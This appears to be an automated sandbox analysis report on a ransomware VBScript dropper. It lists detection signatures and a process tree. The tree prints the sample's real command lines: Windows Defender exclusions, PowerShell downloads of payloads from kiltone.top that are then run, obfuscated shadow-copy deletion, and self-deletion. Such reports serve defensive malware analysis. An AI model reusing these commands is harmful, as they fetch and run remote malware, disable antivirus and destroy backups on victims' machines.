Edit tour
Windows
Analysis Report
NOTIFICATION_OF_DEPENDANTS_1.vbs
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for dropped file
Sigma detected: Delete shadow copy via WMIC
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Deletes shadow drive data (may be related to ransomware)
Loading BitLocker PowerShell Module
May encrypt documents and pictures (Ransomware)
Modifies existing user documents (likely ransomware behavior)
Overwrites Mozilla Firefox settings
Powershell drops PE file
Sigma detected: Control Panel Items
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation STDIN+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: Suspicious Ping/Del Command Combination
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes data at the end of the disk (often used by bootkits to hide malicious code)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Classification
- System is w10x64
- wscript.exe (PID: 1456 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\NOTIF ICATION_OF _DEPENDANT S_1.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 1528 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Command A dd-MpPrefe rence -Exc lusionPath 'C:\Users \user~1\Ap pData\Loca l\Temp' MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1412 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 2120 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell start- process ht tps://www. oldmutual. co.za/v3/a ssets/blt0 554f48052b b4620/blt8 b52803ba23 b252a/6674 2ed3b2cbc1 4f42b4434c /Superfund _Beneficia ry_Nominat ion_form.p df MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6040 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5888 cmdline:
powershell start-pro cess https ://www.old mutual.co. za/v3/asse ts/blt0554 f48052bb46 20/blt8b52 803ba23b25 2a/66742ed 3b2cbc14f4 2b4434c/Su perfund_Be neficiary_ Nomination _form.pdf MD5: 04029E121A0CFA5991749937DD22A1D9) - chrome.exe (PID: 5260 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t https:// www.oldmut ual.co.za/ v3/assets/ blt0554f48 052bb4620/ blt8b52803 ba23b252a/ 66742ed3b2 cbc14f42b4 434c/Super fund_Benef iciary_Nom ination_fo rm.pdf MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - chrome.exe (PID: 7264 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2072 --fi eld-trial- handle=200 0,i,438550 9434330054 281,245478 0159223617 298,262144 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) - cmd.exe (PID: 6380 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell Invoke -WebReques t -Uri htt ps://kilto ne.top/ste lin/rwcla. cpl -Outfi le $env:tm p\\fjeljie s.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6932 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1196 cmdline:
powershell Invoke-We bRequest - Uri https: //kiltone. top/stelin /rwcla.cpl -Outfile $env:tmp\\ fjeljies.c pl MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 2008 cmdline:
"C:\Window s\System32 \cmd.exe" /c control C:\Users\ user~1\App Data\Local \Temp/fjel jies.cpl MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6988 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - control.exe (PID: 7960 cmdline:
control C: \Users\use r~1\AppDat a\Local\Te mp/fjeljie s.cpl MD5: 11C18DBF352D81C9532A8EF442151CB1) - rundll32.exe (PID: 6256 cmdline:
"C:\Window s\system32 \rundll32. exe" Shell 32.dll,Con trol_RunDL L C:\Users \user~1\Ap pData\Loca l\Temp/fje ljies.cpl MD5: EF3179D498793BF4234F708D3BE28633) - rundll32.exe (PID: 576 cmdline:
"C:\Window s\SysWOW64 \rundll32. exe" "C:\W indows\Sys WOW64\shel l32.dll",# 44 C:\User s\user~1\A ppData\Loc al\Temp/fj eljies.cpl MD5: 889B99C52A60DD49227C5E485A016679) - cmd.exe (PID: 4312 cmdline:
cmd /c pow ershell -i nputformat none -out putformat none -NonI nteractive -Command Add-MpPref erence -Ex clusionPat h "$env:tm p" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 8172 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7936 cmdline:
powershell -inputfor mat none - outputform at none -N onInteract ive -Comma nd Add-MpP reference -Exclusion Path "$env :tmp" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - cmd.exe (PID: 3952 cmdline:
cmd /c pow ershell In voke-WebRe quest -Uri https://k iltone.top /stelin/Go sjeufon.cp l -Outfile $env:tmp\ eryy65ty.e xe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3132 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4332 cmdline:
powershell Invoke-We bRequest - Uri https: //kiltone. top/stelin /Gosjeufon .cpl -Outf ile $env:t mp\eryy65t y.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - cmd.exe (PID: 1272 cmdline:
cmd /c %te mp%/eryy65 ty.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1624 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - eryy65ty.exe (PID: 520 cmdline:
C:\Users\u ser~1\AppD ata\Local\ Temp/eryy6 5ty.exe MD5: 2B986178DA0C3D081F99AC8FB4A5952C) - WMIC.exe (PID: 4008 cmdline:
c:\jExFKd\ jExF\..\.. \Windows\j ExF\jExF\. .\..\syste m32\jExF\j ExF\..\..\ wbem\jExF\ jExFK\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 5192 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 8716 cmdline:
c:\xMvAnp\ xMvA\..\.. \Windows\x MvA\xMvA\. .\..\syste m32\xMvA\x MvA\..\..\ wbem\xMvA\ xMvAn\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 8732 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 8724 cmdline:
cmd.exe /C ping 1.1. 1.1 -n 1 - w 3000 > N ul & Del / f /q "C:\U sers\user~ 1\AppData\ Local\Temp \eryy65ty. exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 8740 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 8800 cmdline:
ping 1.1.1 .1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- svchost.exe (PID: 7196 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- eryy65ty.exe (PID: 4848 cmdline:
"C:\Users\ user~1\App Data\Local \Temp\eryy 65ty.exe" MD5: 2B986178DA0C3D081F99AC8FB4A5952C) - WMIC.exe (PID: 4084 cmdline:
c:\qYxiJv\ qYxi\..\.. \Windows\q Yxi\qYxi\. .\..\syste m32\qYxi\q Yxi\..\..\ wbem\qYxi\ qYxiJ\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 6900 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 9116 cmdline:
c:\mCMXKV\ mCMX\..\.. \Windows\m CMX\mCMX\. .\..\syste m32\mCMX\m CMX\..\..\ wbem\mCMX\ mCMXK\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 9132 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 9124 cmdline:
cmd.exe /C ping 1.1. 1.1 -n 1 - w 3000 > N ul & Del / f /q "C:\U sers\user~ 1\AppData\ Local\Temp \eryy65ty. exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 9140 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 9200 cmdline:
ping 1.1.1 .1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- eryy65ty.exe (PID: 5292 cmdline:
"C:\Users\ user~1\App Data\Local \Temp\eryy 65ty.exe" MD5: 2B986178DA0C3D081F99AC8FB4A5952C) - WMIC.exe (PID: 8556 cmdline:
c:\DgeFGH\ DgeF\..\.. \Windows\D geF\DgeF\. .\..\syste m32\DgeF\D geF\..\..\ wbem\DgeF\ DgeFG\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 8564 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 5424 cmdline:
c:\mZDBzN\ mZDB\..\.. \Windows\m ZDB\mZDB\. .\..\syste m32\mZDB\m ZDB\..\..\ wbem\mZDB\ mZDBz\..\. .\wmic.exe shadowcop y delete MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - conhost.exe (PID: 5336 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4664 cmdline:
cmd.exe /C ping 1.1. 1.1 -n 1 - w 3000 > N ul & Del / f /q "C:\U sers\user~ 1\AppData\ Local\Temp \eryy65ty. exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5592 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 4188 cmdline:
ping 1.1.1 .1 -n 1 -w 3000 MD5: B3624DD758CCECF93A1226CEF252CA12)
- notepad.exe (PID: 8876 cmdline:
"C:\Window s\system32 \NOTEPAD.E XE" C:\Use rs\user\Ap pData\Roam ing\Micros oft\Window s\Start Me nu\Program s\Startup\ Decryptfil es.txt MD5: 27F71B12CB585541885A31BE22F61C83)
- cleanup
⊘No configs have been found
⊘No yara matches
Operating System Destruction |
---|
Source: | Author: Joe Security: |
System Summary |
---|
Source: | Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_): |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): |
Source: | Author: Ilya Krestinichev: |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Christian Burkard (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: frack113, Nasreddine Bencherchali: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Software Vulnerabilities |
---|
Source: | Child: | |||
Source: | Child: | Jump to behavior |
Networking |
---|
Source: | Process created: |
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |